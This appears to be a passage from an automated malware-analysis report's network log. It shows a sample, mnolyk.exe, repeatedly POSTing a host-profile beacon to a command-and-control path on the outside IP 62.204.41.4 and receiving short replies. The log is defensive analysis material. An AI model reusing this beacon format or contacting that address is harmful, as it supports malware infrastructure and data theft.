                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.251750946 CET722INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            534192.168.2.45022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:54.430749893 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.492405891 CET723INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            535192.168.2.45023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:54.670213938 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.733669043 CET724INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            536192.168.2.45023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:54.903522015 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:54.966681004 CET725INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            537192.168.2.45023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:55.156269073 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.219661951 CET726INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            538192.168.2.45023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:55.389174938 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.454381943 CET727INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            539192.168.2.45023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:55.624345064 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.688477993 CET728INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            54192.168.2.44974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:39.995475054 CET243OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.062891960 CET243INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            540192.168.2.45023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:55.857099056 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:55.921838045 CET729INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            541192.168.2.45023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:56.097183943 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.162142992 CET730INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            542192.168.2.45023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:56.348459005 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.413418055 CET731INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            543192.168.2.45023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:56.593363047 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.658799887 CET732INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            544192.168.2.45023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:56.854078054 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.919526100 CET733INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            545192.168.2.45024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:57.100033998 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.169399023 CET734INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            546192.168.2.45024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:57.341358900 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.406874895 CET735INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            547192.168.2.45024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:57.575391054 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.638583899 CET736INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            548192.168.2.45024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:57.826941013 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.892657042 CET737INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            549192.168.2.45024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:58.067517042 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.131375074 CET738INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            55192.168.2.44975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:40.228697062 CET244OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.292813063 CET244INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            550192.168.2.45024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:58.312452078 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.376530886 CET739INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            551192.168.2.45024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:58.556274891 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.625153065 CET740INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            552192.168.2.45024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:58.822361946 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
